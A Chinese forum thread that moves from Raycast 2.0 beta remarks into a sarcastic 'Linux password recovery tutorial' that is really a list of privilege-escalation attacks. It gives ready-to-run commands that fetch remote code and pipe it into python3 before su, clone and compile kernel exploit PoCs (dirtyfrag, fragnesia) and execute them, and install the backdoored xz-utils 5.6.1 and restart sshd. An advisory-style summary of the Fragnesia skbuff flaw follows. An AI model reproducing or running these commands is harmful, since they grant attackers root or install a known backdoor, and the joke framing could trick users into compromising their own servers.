Raycast 2.0(Beta) https://www.raycast.com/new
内存占用好像上去了,目前可以和老版本共存
内存占用好像上去了,目前可以和老版本共存
issue 下面除了一个 AI 发布的中转站广告,无人在意 🤣
可能是缓存命中的了+幻觉,不一定是泄露其他用户
1. Linux 找回密码教程,建议收藏!
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持 ZCRX 的高端网卡,让它 down 掉,然后 ptr_ring drain + scrub loop 重复入栈把 free_count 写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许 ssh 外连,只能通过 KVM 物理访问服务器? 没关系,我们的专业黑客团队也可以通过 nginx 帮助运维您的服务器!
https://depthfirst.com/nginx-rift
受 dirtyfrag 影响的所有版本都会受到影响。
Fragnesia 属于 Dirty Frag 漏洞类别。它是 ESP/XFRM 中的一个独立漏洞,与 Dirty Frag 不同,后者已有单独的补丁。但是,它们位于同一攻击面上,缓解措施也与 Dirty Frag 相同。
报告者称,未合入 2026 年 5 月 13 日 net: skbuff: preserve shared-frag marker during coalescing 修复补丁的 Linux 内核均可能受影响。实际风险需结合系统内核版本、发行版补丁回移情况、内核配置、ESP/XFRM 相关模块、user namespace / network namespace 策略以及容器权限配置综合确认。
使用了存在 skb shared-frag 标记丢失问题的 Linux 内核,并且未合入 net: skbuff: preserve shared-frag marker during coalescing 修复补丁的系统。公开 PoC 仓库说明,该 PoC 利用 Linux XFRM ESP-in-TCP 子系统逻辑缺陷,对只读文件的 page cache 实现任意字节写。
Linux kernel net/core/skbuff.c
skb_try_coalesce()
SKBFL_SHARED_FRAG
XFRM ESP input
ESP-in-TCP ULP
TCP receive queue
page cache / skb paged frag